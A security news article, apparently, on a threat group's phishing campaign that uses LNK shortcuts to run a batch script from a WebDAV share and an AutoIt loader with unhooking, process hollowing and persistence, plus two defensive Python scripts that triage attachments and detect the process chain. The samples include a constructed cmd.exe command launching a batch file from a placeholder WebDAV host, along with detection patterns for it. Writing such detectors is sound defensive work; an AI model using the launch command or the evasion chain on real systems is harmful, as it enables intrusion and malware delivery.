Tuesday, May 6, 2025

Sticky Werewolf Weaponizing LNK Files to Attack Organizations


Sticky Werewolf, a cyber threat group, has shifted its delivery strategy: instead of phishing emails carrying download links to malicious files, it now sends archive attachments containing LNK files, which act as shortcuts to malicious executables hosted on WebDAV servers.

When a user opens the LNK, a batch script is triggered, which in turn launches an AutoIt script that delivers the final payload. This sidesteps the group's earlier link-based phishing and runs the malware directly as soon as the user executes the LNK file.

Infection Chain

A cyberespionage group, Sticky Werewolf, is targeting the aviation industry with phishing emails disguised as business invitations from a legitimate Russian aerospace company, AO OKB Kristall, where the emails contain an archive attachment with two malicious LNK files masquerading as DOCX documents and a decoy PDF file.


Clicking the LNK files triggers a Batch script that launches an AutoIt script to ultimately deliver the final payload, which is a significant shift from Sticky Werewolf’s previous tactics of using links to download malware directly from file-sharing platforms. 

Phishing Email

A phishing email with a decoy PDF attachment targets enterprises related to Russian helicopters, as the PDF mentions a video conference and references two malicious LNK files disguised as meeting documents. 

Clicking the LNK files triggers an NSIS self-extracting archive, a variant of the CypherIT crypter, to download and run a malicious executable from a network share.

The extracted files land in the Internet Explorer temporary files directory, and then a batch script is executed. 
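The lure described above rests on two things a mail gateway or sandbox can check before a user ever double-clicks: an archive entry whose name ends in a document extension followed by `.lnk`, and a shortcut whose embedded target string points at a WebDAV-style UNC path. The following Python triage script is an added example written for this article; it is not tooling from the report or from Morphisec. It checks the fixed MS-SHLLINK header (the `0x4C` header size and the `00021401-0000-0000-C000-000000000046` link CLSID), pulls printable ASCII and UTF-16LE strings out of the shortcut, and flags UNC targets, WebDAV `host@80` / `host@SSL` syntax and batch-file launches. The sample archive it builds is constructed for the demonstration; the host `203.0.113.5`, the file names and the `.bat` target are placeholders, not indicators from the campaign.

```python
import io
import re
import zipfile

# MS-SHLLINK fixed header: HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its little-endian on-disk layout.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "0000" "0000" "c000000000000046")

# A document-looking name with a trailing .lnk (the "DOCX that is really a shortcut" lure).
MASQUERADE = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)

# WebDAV-style UNC syntax (\\host@80\..., \\host@SSL\...) or a DavWWWRoot reference.
WEBDAV = re.compile(r"^\\\\[^\\]+@(?:80|443|ssl)\\|davwwwroot", re.IGNORECASE)


def printable_strings(data: bytes, min_len: int = 6):
    """Yield printable ASCII and UTF-16LE strings; LNK metadata stores
    paths and arguments in both encodings."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        yield m.group().decode("utf-16-le")


def triage_lnk(name: str, data: bytes) -> list:
    """Return a list of reasons this archive entry deserves a closer look."""
    reasons = []
    if MASQUERADE.search(name):
        reasons.append("masquerade")          # document extension hidden in front of .lnk
    if data[:20] == LNK_MAGIC:
        reasons.append("lnk-header")          # really a Windows shortcut, whatever the name says
        for s in printable_strings(data):
            if s.startswith("\\\\"):
                reasons.append("unc-target:" + s)
            if WEBDAV.search(s):
                reasons.append("webdav-target")
            if re.search(r"\.bat\b|cmd\.exe", s, re.IGNORECASE):
                reasons.append("script-launch")
    return list(dict.fromkeys(reasons))       # de-duplicate, keep order


def triage_archive(archive: bytes) -> dict:
    """Map each suspicious entry of a ZIP attachment to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as z:
        for info in z.infolist():
            reasons = triage_lnk(info.filename, z.read(info.filename))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample modelled on the lure in the article (not a real artifact):
    a decoy PDF plus a shortcut named like a Word document whose embedded target
    string points at a WebDAV share. Host and names are placeholders."""
    target = "\\\\203.0.113.5@80\\share\\run.bat"
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + target.encode("utf-16-le") + b"\x00\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Meeting_invitation.docx.lnk", fake_lnk)
        z.writestr("agenda.pdf", b"%PDF-1.4\n% decoy document\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reasons in triage_archive(build_sample_archive()).items():
        print(f"{entry}: {', '.join(reasons)}")
```

The header check matters more than the file name: Explorer hides the `.lnk` extension regardless of the "Hide extensions for known file types" setting, so a name check alone is what the lure is designed to beat. On a real shortcut the interesting strings usually live in the LinkInfo and StringData sections and in the EnvironmentVariableDataBlock, which the string extraction above covers without a full parser.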


Two malicious LNK files, disguised as Word documents, are delivered to the user, and opening either one triggers the same sequence of events. First, the LNK adds a registry entry so that a compromised WINWORD.exe runs at every login, giving the malware persistence.

Then it displays a decoy error message to distract the user. The first LNK additionally copies a deceptive image file, while the second LNK behaves the same way and launches the malicious WINWORD.exe.

Batch Script

A batch script within the LNK delays execution if specific antivirus processes are running and potentially renames files to evade detection.

Finally, the script combines a legitimate AutoIt executable with a malicious script and executes them. 

Table (not reproduced here): processes monitored by the batch script and their corresponding security vendors.

This malicious AutoIt script aims to evade detection, establish persistence, and check for signatures of security environments and debuggers. It injects a clean copy of ntdll.dll to bypass API hooking, effectively unhooking any monitoring that a security product has placed on the original library.

Persistence is achieved through scheduled tasks or startup directory modifications, where the payload, hidden within the script, is decrypted using a two-stage RC4 process with a user-defined passphrase. 

According to Morphisec, the decrypted and decompressed payload is injected via process hollowing into a legitimate AutoIT process, making it harder to detect.
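On the endpoint, the chain described in the last sections (Explorer launching cmd.exe on a batch file from a WebDAV path, the batch file starting a legitimate AutoIt interpreter with a script, files renamed to evade detection) leaves a recognisable process tree. The detection logic below is an added example written for this article, not a rule from the report or from Morphisec. It runs over constructed Sysmon-style process-creation events; the PIDs, paths and command lines are made up, the `203.0.113.5` host is a placeholder, and the `OriginalFileName` of `AutoIt3.exe` and the `.a3x` script extension are assumptions about how a legitimate AutoIt binary and its compiled script appear, since the article does not name them. The renamed-binary check relies on the PE version-resource name that Sysmon records as OriginalFileName, which survives renaming the file on disk.

```python
import re

# Constructed Sysmon-style process-creation (event ID 1) records for the chain
# described above. All values are made up for the example.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "orig": "EXPLORER.EXE", "cmdline": "explorer.exe"},
    # user opens the shortcut: Explorer starts cmd.exe on a batch file from a WebDAV share
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "orig": "Cmd.Exe", "cmdline": r'cmd.exe /c "\\203.0.113.5@80\share\run.bat"'},
    # batch file starts a renamed AutoIt interpreter (assumed OriginalFileName) with a script in Temp
    {"pid": 300, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "orig": "AutoIt3.exe", "cmdline": r"svc.exe C:\Users\u\AppData\Local\Temp\svc.a3x"},
    # benign Word started from the desktop, included so the rules do not fire on it
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "orig": "WinWord.exe", "cmdline": "WINWORD.EXE /n"},
]

TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\|\\inetcache\\|\\temporary internet files\\",
                      re.IGNORECASE)
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:80|443|ssl)\\", re.IGNORECASE)


def ancestors(events_by_pid: dict, pid: int) -> list:
    """Return the event for pid followed by its parent, grandparent, ... as far as known."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)
        ev = events_by_pid[pid]
        chain.append(ev)
        pid = ev["ppid"]
    return chain


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(events: list) -> list:
    """Return (pid, rule) pairs for events matching the LNK -> batch -> AutoIt chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        images = [basename(c["image"]) for c in ancestors(by_pid, ev["pid"])]
        parents = images[1:]
        # Rule 1: Explorer (a double-click) starting cmd.exe on a .bat served over WebDAV
        if (images[0] == "cmd.exe" and parents[:1] == ["explorer.exe"]
                and WEBDAV_UNC.search(ev["cmdline"]) and ".bat" in ev["cmdline"].lower()):
            alerts.append((ev["pid"], "batch-from-webdav"))
        # Rule 2: AutoIt interpreter identified by version resource, not by file name
        if ev["orig"].lower() == "autoit3.exe":
            if images[0] != "autoit3.exe":
                alerts.append((ev["pid"], "renamed-autoit"))
            if TEMP_DIR.search(ev["cmdline"]):
                alerts.append((ev["pid"], "autoit-script-in-temp"))
            if "cmd.exe" in parents:
                alerts.append((ev["pid"], "autoit-spawned-by-batch"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule is weak on its own (administrators do run AutoIt, and cmd.exe under explorer.exe is common), so the value is in scoring the three AutoIt hits together with the WebDAV batch launch on the same process tree. The same ancestry walk can be extended to the later stages the article mentions: a scheduled-task or startup-folder write, or a Run-key entry pointing at WINWORD.exe outside the Office directory, attributed back to the cmd.exe that opened the shortcut.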

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
